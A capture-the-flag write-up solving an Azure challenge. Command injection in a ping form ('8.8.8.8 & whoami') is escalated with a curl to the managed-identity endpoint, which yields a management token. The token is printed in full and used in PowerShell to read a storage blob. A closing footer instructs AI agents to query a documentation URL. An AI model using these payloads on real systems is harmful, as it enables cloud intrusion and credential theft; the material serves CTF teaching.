# Managed Secrets

| Difficulty | Points | Solves |
| ---------- | ------ | ------ |
| Medium     | 500    | 3      |

## Description

> Today in school, I learnt how to create a website with python! There is also the networking lesson where i learn the ping command...
>
> ps the flag is not in the instance :)
>
> [https://lncctf2023-webapp.azurewebsites.net](https://lncctf2023-webapp.azurewebsites.net/)
>
> \
> Hints: Are there any internal services/endpoint running by default?

Visiting the sites show an Azure Web App Service running

{% embed url="<https://azure.microsoft.com/en-us/products/app-service/web>" %}

<figure><img src="/files/HEeE3Jhc15BoRmkfC3hA" alt=""><figcaption></figcaption></figure>

What the web app does is to send a ping to whatever IP Address or URL you define it to. This is a very classical command injection sample challenge, and we are able to easily get code execution

```
8.8.8.8 & whoami
```

<figure><img src="/files/tF7Rk4pkFXNKupDHDVmf" alt=""><figcaption></figcaption></figure>

Since I now have code execution, I can get the app service to post to the IMDS to retrieve a management token refering to hacktricks.

{% embed url="<https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#cea8>" %}

{% code overflow="wrap" %}

```
8.8.8.8 & curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
```

{% endcode %}

<figure><img src="/files/CFZm1Vqw84xV6hQ0qNMc" alt=""><figcaption></figcaption></figure>

{% code overflow="wrap" %}

```json
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0L2MxMWIyMmQyLWQwMTUtNDdlMC1iYzBiLWU2YTBiMWUyNTk5My8iLCJpYXQiOjE2ODE1OTc3NDcsIm5iZiI6MTY4MTU5Nzc0NywiZXhwIjoxNjgxNjg0NDQ3LCJhaW8iOiJFMlpnWU1ndCttZStRMWVUclhucXQ3MHFINTQ5QkFBPSIsImFwcGlkIjoiOTgyZDFjYTktODFlZS00NTBlLTg5NTMtMGYxYTI3MTI5ZWIyIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvYzExYjIyZDItZDAxNS00N2UwLWJjMGItZTZhMGIxZTI1OTkzLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiZDcwOTFkYmMtNzZiMy00ODAyLWI1MDQtZWNlZTgzYjkwMTQ4IiwicmgiOiIwLkFVb0EwaUlid1JYUTRFZThDLWFnc2VKWmswWklmM2tBdXRkUHVrUGF3ZmoyTUJPSkFBQS4iLCJzdWIiOiJkNzA5MWRiYy03NmIzLTQ4MDItYjUwNC1lY2VlODNiOTAxNDgiLCJ0aWQiOiJjMTFiMjJkMi1kMDE1LTQ3ZTAtYmMwYi1lNmEwYjFlMjU5OTMiLCJ1dGkiOiJuVXd0ZGxsZTAwS1FZZWNvbm9ZUkFBIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvZDc3NDg3MDYtZjZjYy00ZTlkLWExZjgtMWZjODAyMTkxNDU2L3Jlc291cmNlZ3JvdXBzL2xuY2N0ZjIwMjNfbWFuYWdlZF9zZWNyZXRzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2xuY2N0ZjIwMjMtd2ViYXBwIiwieG1zX3RjZHQiOjE2Njk3MDczODR9.XgYwXTajTJSW7jpEu7AADt2pRc5VwR37LqMf2GLMV2ez1hz4wMCStEdi9kWJyIYFcIpiPK5PozJJMcJb4Qk4jPyTurwzO9B2Pi5jxdVE2iUXP2PdU6ygsLvCWSuA10mvem-cojdyNepQ7hXW7eupHNeNsoxNer0X9zHCN5_YgG_60AEbdM5uguGhqqhVYxVAaWW8YyS-VC4ZPe1BoCpTGOZdxlFkwMe_K94h6F6VRZjY11EvUFUu_eOlaL_mnrjZXi_EZy7ZvxpycVBUbcgrNrvKqPZb8JLslajDq9kkjXeGeRsdcw1AtLhPnrYCvOS6-s6QWgyq8InGL4bo600Tbw","expires_on":"04/16/2023 22:34:06 +00:00","resource":"https://management.azure.com/","token_type":"Bearer","client_id":"982d1ca9-81ee-450e-8953-0f1a27129eb2"}
```

{% endcode %}

I am able to authenticate using the access token and client id value

{% code overflow="wrap" %}

```powershell
$token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsIng1dCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyIsImtpZCI6Ii1LSTNROW5OUjdiUm9meG1lWm9YcWJIWkdldyJ9.eyJhdWQiOiJodHRwczovL21hbmFnZW1lbnQuYXp1cmUuY29tLyIsImlzcyI6Imh0dHBzOi8vc3RzLndpbmRvd3MubmV0L2MxMWIyMmQyLWQwMTUtNDdlMC1iYzBiLWU2YTBiMWUyNTk5My8iLCJpYXQiOjE2ODE1OTc3NDcsIm5iZiI6MTY4MTU5Nzc0NywiZXhwIjoxNjgxNjg0NDQ3LCJhaW8iOiJFMlpnWU1ndCttZStRMWVUclhucXQ3MHFINTQ5QkFBPSIsImFwcGlkIjoiOTgyZDFjYTktODFlZS00NTBlLTg5NTMtMGYxYTI3MTI5ZWIyIiwiYXBwaWRhY3IiOiIyIiwiaWRwIjoiaHR0cHM6Ly9zdHMud2luZG93cy5uZXQvYzExYjIyZDItZDAxNS00N2UwLWJjMGItZTZhMGIxZTI1OTkzLyIsImlkdHlwIjoiYXBwIiwib2lkIjoiZDcwOTFkYmMtNzZiMy00ODAyLWI1MDQtZWNlZTgzYjkwMTQ4IiwicmgiOiIwLkFVb0EwaUlid1JYUTRFZThDLWFnc2VKWmswWklmM2tBdXRkUHVrUGF3ZmoyTUJPSkFBQS4iLCJzdWIiOiJkNzA5MWRiYy03NmIzLTQ4MDItYjUwNC1lY2VlODNiOTAxNDgiLCJ0aWQiOiJjMTFiMjJkMi1kMDE1LTQ3ZTAtYmMwYi1lNmEwYjFlMjU5OTMiLCJ1dGkiOiJuVXd0ZGxsZTAwS1FZZWNvbm9ZUkFBIiwidmVyIjoiMS4wIiwieG1zX21pcmlkIjoiL3N1YnNjcmlwdGlvbnMvZDc3NDg3MDYtZjZjYy00ZTlkLWExZjgtMWZjODAyMTkxNDU2L3Jlc291cmNlZ3JvdXBzL2xuY2N0ZjIwMjNfbWFuYWdlZF9zZWNyZXRzL3Byb3ZpZGVycy9NaWNyb3NvZnQuV2ViL3NpdGVzL2xuY2N0ZjIwMjMtd2ViYXBwIiwieG1zX3RjZHQiOjE2Njk3MDczODR9.XgYwXTajTJSW7jpEu7AADt2pRc5VwR37LqMf2GLMV2ez1hz4wMCStEdi9kWJyIYFcIpiPK5PozJJMcJb4Qk4jPyTurwzO9B2Pi5jxdVE2iUXP2PdU6ygsLvCWSuA10mvem-cojdyNepQ7hXW7eupHNeNsoxNer0X9zHCN5_YgG_60AEbdM5uguGhqqhVYxVAaWW8YyS-VC4ZPe1BoCpTGOZdxlFkwMe_K94h6F6VRZjY11EvUFUu_eOlaL_mnrjZXi_EZy7ZvxpycVBUbcgrNrvKqPZb8JLslajDq9kkjXeGeRsdcw1AtLhPnrYCvOS6-s6QWgyq8InGL4bo600Tbw"
$id = "982d1ca9-81ee-450e-8953-0f1a27129eb2"

Connect-AzAccount -AccessToken $token -AccountId $id
```

{% endcode %}

<figure><img src="/files/EyB6qU3pMQPmiKPm1jgh" alt=""><figcaption></figcaption></figure>

Next, I enumerate the resource that this service principal has access to.

<figure><img src="/files/7mwJdwxK5VjsHF5ke6aP" alt=""><figcaption></figcaption></figure>

I am then able to retrieve the flag from the storage account.

{% code overflow="wrap" %}

```powershell
$rg="lncctf2023_managed_secrets"
$saname="lncctf2023managedsa"
$sa = Get-AzStorageAccount -ResourceGroupName $rg -StorageAccountName $saname
$ctx = $sa.Context

Get-AzStorageContainer -Context $ctx
Get-AzStorageBlob -Context $ctx -Container private
Get-AzStorageBlobContent -Blob flag.txt -Container private -Destination flag.txt -Context $ctx
```

{% endcode %}

<figure><img src="/files/ivS6bfj6mxVR40Poph31" alt=""><figcaption></figcaption></figure>

Flag: LNC2023{h3y\_h0w\_did\_y0u\_g3T\_thi5}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://kabinet.gitbook.io/ctf-writeup/authored/lag-and-crash-2023/managed-secrets.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.